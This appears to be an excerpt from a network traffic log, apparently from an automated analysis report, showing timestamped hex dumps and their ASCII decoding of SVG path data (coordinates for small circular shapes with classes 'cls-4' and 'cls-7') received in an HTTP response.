                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC499INData Raw: 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC515INData Raw: 37 2e 31 37 2c 32 34 32 2e 36 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32
                                                                                                                                                                                                                                                                          Data Ascii: 7.17,242.63a1.72,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC531INData Raw: 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC547INData Raw: 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c
                                                                                                                                                                                                                                                                          Data Ascii: 1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC563INData Raw: 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 30 2e 38 36 2c 32 34 30 2e 34 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39 2c 32 34 37 2e 33 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39
                                                                                                                                                                                                                                                                          Data Ascii: ,1-.16-2.81"/><path class="cls-4" d="M980.86,240.49a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09,247.32a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.9
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC579INData Raw: 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 32 36 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d
                                                                                                                                                                                                                                                                          Data Ascii: .38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M951.26,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d=
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC595INData Raw: 2d 34 22 20 64 3d 22 4d 39 32 31 2e 34 33 2c 31 32 36 2e 32 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32
                                                                                                                                                                                                                                                                          Data Ascii: -4" d="M921.43,126.29a1.7,1.7,0,0,1,.77-2.2,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC611INData Raw: 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 32 34 2c 32 36 33 2e 35 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 34 37 2c 32 37 30 2e 33 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37
                                                                                                                                                                                                                                                                          Data Ascii: 1,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.24,263.56a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.47,270.39a1.7,1.7,0,0,1,.77
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC627INData Raw: 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31
                                                                                                                                                                                                                                                                          Data Ascii: 2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC643INData Raw: 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 35 2e 38 32 2c 31 34 39 2e 33 36 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36 2e 30 35 2c 31 35 36 2e 31 39 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: ,0,1-.15-2.81"/><path class="cls-4" d="M845.82,149.36a1.68,1.68,0,0,1,.76-2.2,2.47,2.47,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846.05,156.19a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC659INData Raw: 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 36 33 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64
                                                                                                                                                                                                                                                                          Data Ascii: 2.36,2.36,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.63,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC675INData Raw: 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c
                                                                                                                                                                                                                                                                          Data Ascii: 1a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC691INData Raw: 35 2c 32 33 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e
                                                                                                                                                                                                                                                                          Data Ascii: 5,237a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC707INData Raw: 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                          Data Ascii: 71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class=
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC723INData Raw: 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 37 38 2c 31 36 35 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35
                                                                                                                                                                                                                                                                          Data Ascii: 2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M557.78,165.66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC739INData Raw: 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 37 35 2c 32 34 31 2e 37 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 34 39 2c 32 33 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c
                                                                                                                                                                                                                                                                          Data Ascii: .22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M591.75,241.76a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path class="cls-7" d="M591.49,234a1.92,1.92,0,0,1-.87,2.49,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC755INData Raw: 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 35 37 2c 31 30 32 2e 30 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: 8"/><path class="cls-7" d="M610.57,102.07a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.
